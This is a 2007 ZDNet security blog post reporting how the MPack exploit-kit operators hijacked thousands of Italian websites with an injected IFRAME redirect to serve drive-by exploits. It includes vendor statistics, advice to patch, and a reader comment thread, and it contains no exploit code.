On Metacritic: Dante's Inferno: Not as good as we hoped
BNET Business Network:
BNET
TechRepublic
ZDNet

June 18th, 2007

Russian hackers hijack Italian sites to serve exploits

Posted by Ryan Naraine @ 10:45 am

Categories: Apple, Botnets, Browsers, Data theft, Exploit code, Firefox, Hackers, Microsoft, Mozilla, Open source, Passwords, Patch Watch, Pen testing, Responsible disclosure, Rootkits, Spam and Phishing, Spyware and Adware, Symantec, Viruses and Worms, Vulnerability research, Zero-day attacks

Tags: Hacker, Exploit, Attack, Ryan Naraine

The Russian crime ring behind the infamous WebAttacker/MPack exploit toolkit hacked into thousands of Italian Web sites over the weekend and used a one-line snippet of code to redirect surfers to a server rigged with drive-by exploits.

MPack statisticsThe ongoing attacks, which is reminiscent of the Dolphin Stadium site breach in February, uses a malicious IFRAME tag embedded into the hacked site to handle the redirection to the malware-laden server.

Around midday today, the server hosting the exploits was live and anti-virus researchers tracking the attacks have found more than 8,000 hijacked Italian Web sites.

The sites at risk cover a wide range of Internet interests — from cars and racing (likely to take advantage of the formula one weekend), hotels, sports, music, lottery and pornography were all victims. Even web sites connected to Jon Bon Jovi and Mother Teresa weren’t spared, according to virus researchers at Trend Micro.

Here’s a diagram of the attack scenario from Trend Micro’s Carolyn Guevarra:

italian_iframe.gif

The MPack exploit kit used in this attacks contain a stats counter that spell out in detail the types of exploits used, the number of compromised computers and types of browsers used by the victim (see screenshot above). In this case, it is clear that some newer exploit modules have been added to take aim at flaws in Firefox, Opera and even Apple’s QuickTime media player.

Symantec’s Elia Floria provides a glimpse at the statistics:

The list of compromised sites is huge and from Mpack statistics this attack is working efficiently (the statistic page reports 65K unique visitors with almost 7K exploited browsers).

It is important to note that the exploits are targeting vulnerabilities that have already been patched so the best defense is to ensure that your machine is fully patched (OS and applications running on top).

Secunia’s free software inspector is a nice place to start scanning your machine to look for weak spots. This tool will detect insecure versions of applications installed, verify that all Microsoft patches are applied and assist you in updating your system and applications .

Ryan NaraineRyan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.


Email Ryan Naraine

For daily updates on Ryan's activities, follow him on Twitter.

Subscribe to Zero Day via Email alerts or RSS.

Related Discussions on TechRepublic

Did you know you can take part in these discussions with your ZDNet membership?

  • Talkback
  • Most Recent of 45 Talkback(s)
Sorry to say folks but Ryan is UNBIASED when it comes to security .
He may work at ZDNET but this shouldn't mean that he is like the rest of ZDNET employees . The majority of servers and OS's on ZDNET , CNET , & BNET are all running Linux , Solaris , Apache , & Coyote... (Read the rest)
Posted by: I'm Ye, the MS SHILL . Posted on: 07/11/07 You are currently: a Guest | | Terms of Use
No mention of OS involved......  linux for me | 06/18/07
That you want or need to be told that...  toadlife | 06/18/07
Looks like all OS have been targeted.  Mr. Roboto | 06/18/07
not my understanding...windows only....  jjarman | 06/19/07
My understanding is , that Windows is being exploited .  Intellihence | 06/18/07
Your understanding is nil.  No_Ax_to_Grind | 06/18/07
Is that your best takes .  Intellihence | 06/18/07
"end of summer" threat?  rtk | 06/19/07
OSX has been owned  NonZealot | 06/18/07
Message has been deleted.  Intellihence | 06/18/07
wow, your facts are soooo......made up!  jjarman | 06/19/07
Where are your facts Zealot ?  I'm Ye, the MS SHILL . | 07/11/07
What would *realy* help...  Mr. Roboto | 06/18/07
Third octet  Ryan NaraineZDNet Moderator | 06/18/07
239  Ryan NaraineZDNet Moderator | 06/18/07
important story, but sensationalism ruins it  faddah | 06/18/07
Hang on a minute.  No_Ax_to_Grind | 06/18/07
Erm...  zkiwi | 06/18/07
I can't believe how offended No_Axe & NonZealot have become over this .  Intellihence | 06/18/07
Huh?  rtk | 06/19/07
This issue hasn't affected me at all ,,,  I'm Ye, the MS SHILL . | 07/11/07
He is refering to OS's only .  Intellihence | 06/18/07
Unpatched  Stan57 | 06/19/07
re: thoses who dont update have a problem.  Still Lynn | 06/19/07
Clue for you, Servers run an OS.  No_Ax_to_Grind | 06/19/07
please remember...not all mac owners are the same...  jjarman | 06/19/07
just remembered...  jjarman | 06/19/07
Oh snap  zkiwi | 06/19/07
source?  rtk | 06/19/07
netcraft  zkiwi | 06/19/07
nice try  rtk | 06/20/07
So...  zkiwi | 06/21/07
They were Microsoft's II's Servers .  I'm Ye, the MS SHILL . | 07/11/07
Who's being sensationalist??  MGP2 | 06/19/07
IT COULD BE THAT ISRAEL IS U.N. OFF LIMITS  BALTHOR | 06/18/07
Which Microsoft patches...  j.dupont | 06/18/07
re: ... should I apply to my system ?  Still Lynn | 06/19/07
keep any vulnerable system with net access patched and secure.  jjarman | 06/19/07
already patched  faddah | 06/19/07
Gees  bcroner | 06/19/07
What about the webservers?  bradhansen@... | 06/19/07
Not known yet.  odubtaig | 06/20/07
Ryan  Update victim | 06/19/07
Sorry to say folks but Ryan is UNBIASED when it comes to security .  I'm Ye, the MS SHILL . | 07/11/07
Ryan, thanks, especially for Secunia tip  Narr vi | 06/19/07

What do you think?

SponsoredWhite Papers, Webcasts, and Downloads

advertisement

Recent Entries

advertisement

Archives

Favorite Links

ZDNet Blogs

White Papers, Webcasts, and Downloads

SmartPlanet

Click Here